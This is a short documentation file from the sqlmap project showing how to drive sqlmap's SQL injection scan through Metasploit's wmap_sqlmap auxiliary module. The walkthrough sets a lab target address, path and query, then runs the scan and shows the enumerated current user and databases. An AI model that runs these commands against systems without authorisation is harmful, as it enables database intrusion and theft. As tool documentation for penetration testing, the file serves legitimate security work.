mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-22 17:46:37 +03:00
75 lines
3.4 KiB
Plaintext
75 lines
3.4 KiB
Plaintext
|
To use Metasploit's sqlmap auxiliary module launch msfconsole and follow
|
||
|
|
the example below:
|
||
|
|
|
||
|
|
$ ./msfconsole
|
||
|
|
|
||
|
|
_ _ _ _
|
||
|
|
| | | | (_) |
|
||
|
|
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_
|
||
|
|
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
|
||
|
|
| | | | | | __/ || (_| \__ \ |_) | | (_) | | |_
|
||
|
|
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
|
||
|
|
| |
|
||
|
|
|_|
|
||
|
|
|
||
|
|
|
||
|
|
=[ msf v3.2-testing
|
||
|
|
+ -- --=[ 308 exploits - 173 payloads
|
||
|
|
+ -- --=[ 20 encoders - 6 nops
|
||
|
|
=[ 75 aux
|
||
|
|
|
||
|
|
msf > use auxiliary/scanner/http/wmap_sqlmap
|
||
|
|
msf auxiliary(wmap_sqlmap) > set RHOSTS 192.168.1.121
|
||
|
|
RHOSTS => 192.168.1.121
|
||
|
|
msf auxiliary(wmap_sqlmap) > set PATH /sqlmap/mysql/get_int.php
|
||
|
|
PATH => /sqlmap/mysql/get_int.php
|
||
|
|
msf auxiliary(wmap_sqlmap) > set QUERY id=1
|
||
|
|
QUERY => id=1
|
||
|
|
msf auxiliary(wmap_sqlmap) > set OPTS '--dbs --current-user'
|
||
|
|
OPTS => --dbs --current-user
|
||
|
|
msf auxiliary(wmap_sqlmap) > set SQLMAP_PATH /home/inquis/software/sqlmap/trunk/sqlmap/sqlmap.py
|
||
|
|
msf auxiliary(wmap_sqlmap) > show options
|
||
|
|
|
||
|
|
Module options:
|
||
|
|
|
||
|
|
Name Current Setting Required Description
|
||
|
|
---- --------------- -------- -----------
|
||
|
|
BATCH true yes Never ask for user input, use the default behaviour
|
||
|
|
DATA no The data string to be sent through POST
|
||
|
|
METHOD GET yes HTTP Method
|
||
|
|
OPTS --dbs --current-user no The sqlmap options to use
|
||
|
|
PATH /sqlmap/mysql/get_int.php yes The path/file to test for SQL injection
|
||
|
|
Proxies no Use a proxy chain
|
||
|
|
QUERY id=1 no HTTP GET query
|
||
|
|
RHOSTS 192.168.1.121 yes The target address range or CIDR identifier
|
||
|
|
RPORT 80 yes The target port
|
||
|
|
SQLMAP_PATH /home/inquis/software/sqlmap/trunk/sqlmap/sqlmap.py yes The sqlmap >= 0.6.1 full path
|
||
|
|
SSL false no Use SSL
|
||
|
|
THREADS 1 yes The number of concurrent threads
|
||
|
|
VHOST no HTTP server virtual host
|
||
|
|
|
||
|
|
msf auxiliary(wmap_sqlmap) > run
|
||
|
|
[*] exec: /home/inquis/software/sqlmap/trunk/sqlmap/sqlmap.py -u 'http://192.168.1.121/sqlmap/mysql/get_int.php?id=1' --method GET --dbs --current-user --batch
|
||
|
|
SQLMAP:
|
||
|
|
SQLMAP: sqlmap/0.6.1 coded by Bernardo Damele A. G. <bernardo.damele@gmail.com>
|
||
|
|
SQLMAP: and Daniele Bellucci <daniele.bellucci@gmail.com>
|
||
|
|
SQLMAP:
|
||
|
|
SQLMAP: [*] starting at: 01:31:41
|
||
|
|
SQLMAP:
|
||
|
|
SQLMAP: [01:31:42] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
|
||
|
|
SQLMAP: back-end DBMS: MySQL >= 5.0.0
|
||
|
|
SQLMAP:
|
||
|
|
SQLMAP: current user: 'testuser@localhost'
|
||
|
|
SQLMAP:
|
||
|
|
SQLMAP: available databases [4]:
|
||
|
|
SQLMAP: [*] information_schema
|
||
|
|
SQLMAP: [*] mysql
|
||
|
|
SQLMAP: [*] privatedb
|
||
|
|
SQLMAP: [*] test
|
||
|
|
SQLMAP:
|
||
|
|
SQLMAP:
|
||
|
|
SQLMAP: [*] shutting down at: 01:31:44
|
||
|
|
SQLMAP:
|
||
|
|
[*] Auxiliary module execution completed
|
||
|
|
msf auxiliary(wmap_sqlmap) >
|